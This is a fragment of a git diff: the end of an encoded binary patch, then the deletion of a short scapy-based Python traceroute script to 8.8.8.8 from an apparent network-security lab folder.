zO#|^>HeDrXO+)m!((|6P*DP4@p1X1-t7<7}YA@Zm+IL6a`iRO@LwOxZAB>3>T1;$J
z0ONaAMY!HW%8vKOaryWxB-;bEG(D%}t;!!?Ql*~bjAg2ntCjw&l2vn6DgS%M`^ViS
z*T~hh5cP`RqIkRFw<><8;`b^3km64%KCJjligP*JH7m8guI{6urC8Zs8>(E17Y3D~
zs*0+bimD3QK>Qv=ah)z+r;ob@ME&H$PF&u19#Yziz>C>m3EYp-A5{BAmASY|;Y}`_
z-Yt+l-$!h}0STX2Bsw$;;eNkG;`8nM!qVcs0TPrC-<OQ%r2R$qK3B#cMxt2#pD2O<
zOy(058a2d4#qv208=qJp+~eW5(l;PlLWP-}lJ*M)-*2pa7m0Z+IQSw2B;=4e`Fn|%
zi>(?X7GDXxSU&Y7@NE*GCC;k;lJ9hoRXgyYD7X8COG%Qwf41P~8{^p$`G2(pzOMxS
zlM?uF37qySP(9soc(sK6JHSI+X$PN)2j5(Ox#0VYRSOBn=^S>V_ew<901sl^c4<<y
zFMp8b&a%(@T%$DCDSIC0>~KBsc^J<R(v1d^@5I1ACUFTBTsA5D@2gIh@7Q1wEn#m0
zr*^r^?E@Yv$k`I^2fnxn{!`%d{4?$Ub8PY~;Vd|Lb6du&4AV~gXlueSqdNqER&10{
zH3Oa6GjEtl1N-h%@hnVZX=6ucx;5HqV3U3(Yec(yL|Z!9)fqSAv2aCk3);q?Frt}E
zwAa83)J(5v&qR}PBi5Zv_QJ&>8L-4r0*7f<zJ|?&+o*bYK}(f0jQY)MH%5%erga83
z?yvjQrnMUz>Hy<$YeaOV)z@tn#`?yaYS%UzH`UiSM_P=QwY7~Ac(_j;Xnc_1zZ@B$
z;|;bg9W|Ib1W^DdQbya(Y<E%^@mSQ13K;<uTX-PCcB!@wMc6XsY@K*0fUKht1&}-t
zQGlS2P@;9JVd`Lp%cSt&gAvQ7jgDw4Mu#FAZh~(N4d~9|l{oqf7o#<sRXNHt8uB1V
zL6%fCBNM&NNOT$2yK;33q`=BBZ~%jQjZS71J#JBW^rJ8X8XoHGNP$9xv%N_(+6r!F
zEZ)JXRN9P(cci+*t=$P6K}y6#IFZ6(kS-z7j%c<+gk!xa<X~|#V`*-UXR`P_P#_r4
zW#XMta!{$RPLpy(#lmL12Ui;I(4}S9hvOY;fOp`0j4g?<U9GN68YgDVUIneKZCFNk
zqs-E}6|5{djgq6uL>sD=Mq#*wWeu#-&{HCeJ2HtI&3U(f;55yLX%30Uh@?{I?35b+
z%L@tn^8_BbwtuN}kL*RZPO5?M56mgKe4b}B=lM97%kx{#Lqme**zC{qaOQhefizvG
zB>VGxSO-RPS@!37J#(JN!$gw1{!Kt>&dmNiPiDSY`EmW(j`=p|X%5aZ&%>E(%HLgo
z1&dB3C~x-XbpZ1rWys~b+kdO_uT^%uu3*mV5b~$Bhugmo7{x>_52pS<sd+Q6w_qZP
z>%lUu<DC8><;Q%84Hf6<IP*JQ{$onPJnSlv{W#mZT>d<-V$SPHws&PG?os|6e-Toa
zinl0{ncM$<D5(AH&+}F0G;ep3+y7xGo&I}5mNj#lPdkbGkFh6^aNhs=RhEXi#)gW!
z{eKDE>CfvI<{_8AyZ$s!$L!8NQ^xCbKBwv~k7ee6gm1v%&+GWnWdK2JXGv2s<8*)1
z*yZ&suOsa9$`o9XTJGEV@i=-DIx=B@KA$(VoV<isYBBrD<uX4DjnkjkCF9D!%l5Pq
z?8n>>XQw~U!?#vg_FPZShW%_A&V+IOd7j##{N46cmXl_y@|C%*Vt@Dj&;Cx%W8Zd0
zVvowOPYoFQKS1+bt`9%IY2D0qN7AOUl~(fCuFSbyHl$@&G5?pYw=6DpIk-geZ+RRi
Ay8r+H

diff --git a/Sniffing_Spoofing/volumes/traceroute.py b/Sniffing_Spoofing/volumes/traceroute.py
deleted file mode 100644
index 6ebc2b1..0000000
--- a/Sniffing_Spoofing/volumes/traceroute.py
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/usr/bin/env python3
-from scapy.all import *
-
-target = "8.8.8.8"
-print(f"Traceroute to {target}...")
-
-for i in range(1, 31):
-    pkt = IP(dst=target, ttl=i) / ICMP()
-    reply = sr1(pkt, verbose=0, timeout=1)
-    
-    if reply is None:
-        print(f"{i}: * * *")
-    elif reply.type == 3: # Destination unreachable
-        print(f"{i}: {reply.src} (Unreachable)")
-        break
-    else:
-        print(f"{i}: {reply.src}")
-        if reply.src == target:
-            print("Reached target!")
-            break